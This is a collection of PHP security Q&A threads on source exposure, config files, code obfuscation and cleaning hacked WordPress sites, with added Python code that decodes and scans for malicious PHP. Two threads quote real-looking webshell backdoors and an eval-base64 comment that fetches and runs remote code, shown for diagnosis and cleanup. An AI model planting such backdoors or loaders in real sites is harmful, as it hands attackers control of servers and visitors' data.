Is there any way for a user to see PHP? [duplicate] - php

Duplicate of: PHP source code security on server
If I have PHP code on my website, is there any way for a user to view it? I ask because I'm using the PEAR Mail package (I might change before I upload my website), and it requires my email and password to be in the code for it to use. Is this a potential security risk, or is there no way for the user to see this code anyway?
While we are at it, is there a good guide for hackers on how to exploit security risks (specifically SQL injections and similar methods)? It would be useful when checking my site's security if I had a full list of all the common things that hackers try, and explanations of how to do them.

Keeping a password in a PHP program file is extremely common practice.
As long as you've named all your files with a .php extension, and your server is configured to process .php files as PHP code, then you shouldn't have any problems.
Don't use a .inc extension or anything like that, because yes, that might expose your code.
Also, it's generally a good idea to place as much of your PHP code as possible outside of the web-accessible areas. Only your base PHP file that is actually loaded on startup should be web accessible. All your includes and libraries should be safely stashed away somewhere else where they can be included, but can't be read directly.

This function will cover it:
highlight_string

What is this PHP file that's appeared on my server? [duplicate]

Duplicate of: wordpress hacked: what does this script actually do?
I have several web sites on a shared server, and have noticed a load of .php files appear in various folders, none of which were put there by me.
I am a .NET developer, so apart from one site which uses WordPress, none of my sites use PHP. Therefore, I can only assume that the server has been accessed, and suspicious files uploaded.
However, with my basic knowledge of PHP, I can't tell what these files are doing. I am hoping some PHP expert can help me.
Here is a sample...
<?php if(key($_GET)=='35')call_user_func($_GET['35'],$_REQUEST['c'],$_REQUEST['d']);
...and another...
<?php
$acnhe="s\x74\x72\x5fr\x65\x70\x6ca\x63e";$admno=$acnhe('f','',"b\x66afsfef6f4f_\x66dfefcfofd\x66e");$acnhe=$admno($acnhe('|','',$_POST['1043f']));$adnmo="\x61ss\145".'rt';#$adnmo($acnhe);#eval($acnhe);
$k=substr("class",2)."ert"; # $k(${"_PO"."ST"} ['335']);
Anyone able to explain what these would do if/when called?
Your WordPress site has been compromised. It's quite common that unpatched security vulnerabilities in WP allow users to inject these kinds of files, which end up causing all sorts of trouble to your visitors (by redirecting them to malicious sites, for example).
You can safely delete this file, and you should do it ASAP.
Also, it's time to secure your WP installation (update the core to the latest version) and go through all of WP's core PHP files and look for similar strings within them (these malicious exploits sometimes allow core WP files to get injected too) and clean them up.
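As an added illustration (not part of the answer above), the two posted samples can be read statically without ever executing them. The Python below decodes PHP's double-quoted escape forms, replays the string-building steps of the second sample to recover the hidden function names (str_replace, base64_decode and assert), and checks both samples for the tells a scanner would key on: request-controlled callables, runs of \x escapes and variable function calls. The sample text is copied from the question; the tell patterns are this example's own choice, not a complete signature set. Note that in the sample as posted, the lines that would actually run the payload sit behind `#` comments; the decoder only shows what they would call.

```python
import re

# PHP double-quoted string escapes: \xHH (hex), \NNN (octal) and the single-letter
# forms. PHP leaves any other backslash sequence as written, so this does too.
_PHP_ESC = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|[nrtvef\\$"])')
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "e": "\x1b", "f": "\f",
           "\\": "\\", "$": "$", '"': '"'}


def php_unescape(literal):
    """Decode the body of a PHP double-quoted string literal (quotes not included)."""
    def one(m):
        tok = m.group(1)
        if tok[0] == "x":
            return chr(int(tok[1:], 16))
        if tok[0] in "01234567":
            return chr(int(tok, 8))
        return _SIMPLE[tok]
    return _PHP_ESC.sub(one, literal)


def resolve_sample():
    """Replay the string-building steps of the second posted sample (its literals are
    copied here) to recover the function names it hides from a plain grep."""
    acnhe = php_unescape(r"s\x74\x72\x5fr\x65\x70\x6ca\x63e")
    # $acnhe('f', '', "...") is therefore str_replace('f', '', "...")
    admno = php_unescape(r"b\x66afsfef6f4f_\x66dfefcfofd\x66e").replace("f", "")
    adnmo = php_unescape(r"\x61ss\145") + "rt"     # "\x61ss\145".'rt'
    k = "class"[2:] + "ert"                         # substr("class",2)."ert"
    return {"acnhe": acnhe, "admno": admno, "adnmo": adnmo, "k": k}


# The two samples exactly as posted in the question.
SAMPLE_1 = r"""<?php if(key($_GET)=='35')call_user_func($_GET['35'],$_REQUEST['c'],$_REQUEST['d']);"""
SAMPLE_2 = r"""<?php
$acnhe="s\x74\x72\x5fr\x65\x70\x6ca\x63e";$admno=$acnhe('f','',"b\x66afsfef6f4f_\x66dfefcfofd\x66e");$acnhe=$admno($acnhe('|','',$_POST['1043f']));$adnmo="\x61ss\145".'rt';#$adnmo($acnhe);#eval($acnhe);
$k=substr("class",2)."ert"; # $k(${"_PO"."ST"} ['335']);"""

# Static tells chosen for this example; each one alone is a reason to open the file.
TELLS = {
    "superglobal_input": re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b"),
    # a callable taken straight from the request: the whole PHP runtime on demand
    "request_controlled_callable": re.compile(
        r"call_user_func(_array)?\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b"),
    # three or more consecutive \xHH escapes: a name hidden from grep
    "hex_escaped_string": re.compile(r"(\\x[0-9A-Fa-f]{2}){3,}"),
    # $name(...): the function is decided at run time
    "variable_function_call": re.compile(r"\$[A-Za-z_]\w*\s*\("),
}


def tells(src):
    """Return the set of tell names found in a piece of PHP source."""
    return {name for name, rx in TELLS.items() if rx.search(src)}


if __name__ == "__main__":
    print(resolve_sample())
    print("sample 1:", sorted(tells(SAMPLE_1)))
    print("sample 2:", sorted(tells(SAMPLE_2)))
```

resolve_sample() reports that $acnhe is str_replace, $admno is base64_decode and both $adnmo and $k are assert: the second sample base64-decodes a POST parameter (after stripping '|' characters) and hands it to assert, which in PHP 5 evaluates a string argument as code.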

Eval Base64 virus Wordpress [duplicate]

Duplicate of: How to get rid of eval-base64_decode like PHP virus files?
I'm using a WordPress blog. Today I got a comment like this:
<!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --><!--/mfunc-->
When I decoded this comment using a decoder, I got:
$data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data);
I'm getting many comments like this. Can anyone help me resolve this problem? Is it a hack, or does it show the beginning of hacking?
It is a hack, or at least an attempt. They are taking advantage of an unresolved WordPress vulnerability that can allow them to download and execute code, among other things. This type of attack has very little public exposure at the moment on the web and can be particularly nasty if it is originating from an educated source. If you notice these types of code snippets around your server side, then please do more research to determine if you are truly infected and, if so, to what level the infection has actually gone. I have seen entire shared hosting servers infected from individual WordPress site admins either allowing via ignorance or actively helping this problem propagate. Unfortunately this particular problem is currently not very well documented on the web, so you will likely have to do a good bit of research to be sure your site is OK. To help you research, I'll clarify the terminology of this hack.
This is a PHP code injection attack that is most likely attempting to exploit a known vulnerability in the WordPress framework. It is using Base64-encoded PHP code to inject itself onto your hosting server via eval(), which is a programming language construct that is present in nearly all programming languages, including PHP. Hackers with extremely organized and advanced abilities have made use of this exploit recently to wreak absolute havoc on compromised WordPress sites, so be extremely careful when handling this type of problem.
None of the suggestions worked for us. The following is how we removed malicious code from multiple WordPress sites without any downtime.
We ran into a problem where we had multiple legacy WordPress sites sharing one filesystem that was infiltrated by this virus.
We ended up writing a little Python script to traverse our filesystem and detect the malicious code.
Here's the code for anyone interested (NOTE: USE AT OWN RISK):
https://github.com/michigan-com/eval_scrubber
pip install eval_scrubber
# finds all infected files, will not do anything but READ
python -m eval_scrubber find .
# attempts to remove malicious code from files, potentially dangerous because it WRITEs
python -m eval_scrubber remove .
That script will scan the filesystem for malicious content and, as a separate command, it will attempt to remove the base64 eval functions.
This is really a temporary solution because the generator of this virus uses PHP comments to cause the regex not to match. We ended up using auditd to monitor what was writing to a file we knew was getting infected: http://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html
Once we found the generator of the virus, we did one more eval_scrubber remove and then our problem was fixed.
I was searching for a good and fast solution. This will help you find which files are infected with eval64. Then you can use search/replace in Dreamweaver and remove it from all files at once.
Threat scan plugin
BUT
There was an index file with 2 short lines of code. Those 2 lines were injecting eval over and over. I forgot which index.php it was, but look in folders:
wp-admin
wp-content
wp-includes
Try to search for md5 in your files using Dreamweaver.
Hope you'll be able to fix it.

How to Make .exe file for P.H.P. offline Application with Security [duplicate]

Duplicate of: Convert a PHP script into a stand-alone windows executable
I have seen this: Convert a PHP script into a stand-alone windows executable, but my problem still remains :(
I have developed an offline application using core PHP. Now I want to sell it to my client, but my problem is that I don't want to allow the client to see my source code or access my source code; they can run my application on their system but should not be able to change the code.
If I made an .EXE of my application, the user could not even copy my source code, and if he/she did, it would not remain useful for them.
And also, the main thing is that I want unique security for a particular user: every user should not have the same access key to access this application.
I have found this on Google and also on this site, but still I didn't get my answer perfectly.
Actually I have no idea about this in PHP. If somebody finds mistakes in my question, then please suggest corrections.
You can use PHP LockIt software. It will encode your code and your client cannot modify your code.
Take a look at HipHop for PHP, a good and reliable 'compiler' for PHP:
http://en.wikipedia.org/wiki/HipHop_for_PHP
https://github.com/facebook/hiphop-php/
Check Zend Guard.
Zend Guard, the most widely accepted PHP encoding and obfuscation product on the market, protects your application from unlicensed use and reverse engineering.
Prevent reverse engineering & unauthorized modifications
Protect your code from unauthorized use
Zend Optimizer and Zend Guard Loader - the free runtime decoders for Zend Guard
It's a really good solution to protect your project.

Are PHP config files secure on HTTP? [duplicate]

Duplicate of: Security of PHP script, embedded or otherwise
Many PHP apps available for download (Wordpress, for example) contain configuration files including sensitive information (passwords, database login details, etc.). Are these files really secure? I know if someone navigates to them directly or tries to download them (via http://www.example.com/admin/config.php for example) all they will see is a blank page without any data on it. However, I am still wary. Might you be able to enlighten me regarding file security best practices in this regard? Thank you!
They are typically safe. However, best is to include the configuration file from above the public_html folder so direct access is not possible. Otherwise there are tons of other ways to keep them safe.
In general, they are safe. But if at all possible, they should be moved to a directory not reachable from the web, because if for whatever reason the PHP parser stops working and spits out plaintext source code, your configs won't be visible.
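The two answers above, and the first answer on this page about .inc files, make the same point: only files the server hands to the PHP interpreter are safe to hold credentials, and a config file with any other extension (or a backup copy such as config.php.bak that an editor leaves behind) is served as plain text. The following is an added example, not code from either answer: a Python audit script that walks a document root, treats everything whose final extension is not .php or .phtml (an assumed handler list; match it to your server configuration) as raw-served, and reports such files that contain credential-looking assignments. The file tree it builds in a temporary directory is constructed for the demo, and the credential pattern is this example's own and not exhaustive.

```python
import os
import re
import tempfile
from pathlib import Path

# Extensions the web server is assumed to hand to the PHP interpreter; any other file
# under the document root is returned byte-for-byte. Match this to your own server config.
PHP_HANDLED = {".php", ".phtml"}

# Assignment-style credential lines: $db_password = '...', define('DB_PASSWORD', '...'),
# 'api_key' => '...'. An assumed pattern for the demo, not a complete secret detector.
SECRET_RE = re.compile(
    r"""(password|passwd|pwd|secret|api[_-]?key|db_pass)\w*["']?\s*(=>|=|,)\s*["'][^"']+["']""",
    re.IGNORECASE,
)


def is_served_raw(path):
    """True if the server would return this file's bytes instead of executing it.
    Only the final suffix counts: config.php.bak and db.php~ are plain files."""
    return Path(path).suffix.lower() not in PHP_HANDLED


def scan_docroot(docroot):
    """Return sorted (relative_path, offending_line) pairs for every raw-served file
    under docroot whose content looks like it holds a credential."""
    findings = []
    root = Path(docroot)
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            p = Path(dirpath) / name
            if not is_served_raw(p):
                continue
            try:
                text = p.read_text(errors="replace")
            except OSError:
                continue
            for line in text.splitlines():
                if SECRET_RE.search(line):
                    findings.append((p.relative_to(root).as_posix(), line.strip()))
                    break
    return sorted(findings)


def demo():
    """Build a constructed document root in a temporary directory and scan it."""
    files = {
        # executed, not served: a password here is not exposed by the web server
        "index.php": "<?php\n$mail_password = 'hunter2';\ninclude '../private/config.php';\n",
        # .inc is not handled as PHP by default, so this is served as text
        "config.inc": "<?php\n$db_password = 's3cret';\n",
        # backup copies left beside the live file are plain files
        "config.php.bak": "<?php\ndefine('DB_PASSWORD', 'old-secret');\n",
        "lib/db.php~": "<?php\n$pwd = 'editor-backup';\n",
        # raw-served but holds no credential
        "readme.txt": "Set the password in config.php before use.\n",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in files.items():
            dest = Path(tmp, rel)
            dest.parent.mkdir(parents=True, exist_ok=True)
            dest.write_text(body)
        return [rel for rel, _ in scan_docroot(tmp)]


if __name__ == "__main__":
    for rel in demo():
        print("exposed:", rel)
```

The demo reports config.inc, config.php.bak and lib/db.php~ and stays silent on index.php, which is the answers' point in executable form. The include of ../private/config.php in index.php shows the recommended layout: the file holding the credentials lives above the document root, where no URL maps to it at all, so the question of which handler serves it never arises.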

any php encryption key? [duplicate]

Duplicate of: Minify / Obfuscate PHP Code
I have a PHP file. Does anyone know of any encryption techniques/keys to encrypt the code? I don't want to make it human-readable. I was thinking I could include the encryption keys in an include file hosted separately somewhere. Any help and ideas?
Are you looking for something like Zend Guard ?
Zend Guard, the most widely accepted PHP encoding and obfuscation product on the market, protects your application from unlicensed use and reverse engineering.
I think the best way is to obfuscate the code. I've never done that in PHP, but I use YUI for JS code. I googled it and found http://www.codeeclipse.com/. Try that.
Nobody who cares a bit about security is going to use your app if it wants to include - e.g. EXECUTE - code from your server, loaded at runtime.
The only real solution if you really need to encrypt your code (usually you don't!) is buying ioncube or zend encoder to compile the PHP code to a bytecode which is then executed by a zend extension in the PHP core (i.e. the user needs to be able to load php extensions)
